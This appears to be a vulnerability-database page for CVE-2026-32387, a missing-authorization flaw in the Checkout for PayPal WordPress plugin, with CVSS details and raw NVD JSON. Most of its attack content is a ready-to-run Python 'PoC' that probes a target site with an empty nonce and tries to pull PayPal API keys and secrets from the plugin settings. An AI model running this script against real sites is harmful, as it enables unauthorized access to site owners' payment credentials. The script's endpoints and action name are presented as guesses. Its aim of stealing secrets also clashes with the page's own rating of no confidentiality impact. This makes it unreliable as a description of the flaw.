Security Vulnerability Report
中文
CVE-2026-32387 CVSS 5.3 MEDIUM

CVE-2026-32387

Published: 2026-03-13 19:54:54
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in Noor Alam Checkout for PayPal checkout-for-paypal allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Checkout for PayPal: from n/a through <= 1.0.46.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Checkout for PayPal <= 1.0.46

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-32387 PoC - Missing Authorization in Checkout for PayPal plugin # Target: WordPress site with Checkout for PayPal plugin <= 1.0.46 def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2026-32387 """ # Common vulnerable endpoints for Checkout for PayPal plugin vulnerable_endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/checkout-paypal/v1/', '/?rest_route=/checkout-paypal/v1/' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/json' } print(f"[*] Scanning target: {target_url}") print(f"[*] CVE-2026-32387: Checkout for PayPal Authorization Bypass") for endpoint in vulnerable_endpoints: url = target_url.rstrip('/') + endpoint # Test unauthorized access to plugin functions # This payload attempts to access admin-only functions without authentication data = { 'action': 'checkout_paypal_admin_action', 'nonce': '', 'subaction': 'get_settings' # Attempt to retrieve sensitive settings } try: response = requests.post(url, data=data, headers=headers, timeout=10, verify=False) # Check for signs of successful unauthorized access if response.status_code == 200: # Check if sensitive data is returned without auth check if any(keyword in response.text.lower() for keyword in ['paypal', 'api_key', 'secret', 'settings', 'config']): print(f"[!] VULNERABLE: {url}") print(f"[!] Unauthorized access to sensitive data detected") print(f"[+] Response snippet: {response.text[:200]}...") return True except requests.RequestException as e: print(f"[-] Error connecting to {url}: {e}") print("[*] No obvious vulnerability detected (manual verification recommended)") return False if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] else: target = input("Enter target URL: ").strip() check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32387", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:54.100", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Noor Alam Checkout for PayPal checkout-for-paypal allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Checkout for PayPal: from n/a through <= 1.0.46."}, {"lang": "es", "value": "Vulnerabilidad por Autorización Faltante en Noor Alam Checkout for PayPal checkout-for-paypal permite Explotar Niveles de Seguridad de Control de Acceso Incorrectamente Configurados. Este problema afecta a Checkout for PayPal: desde n/a hasta &lt;= 1.0.46."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/checkout-for-paypal/vulnerability/wordpress-checkout-for-paypal-plugin-1-0-46-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}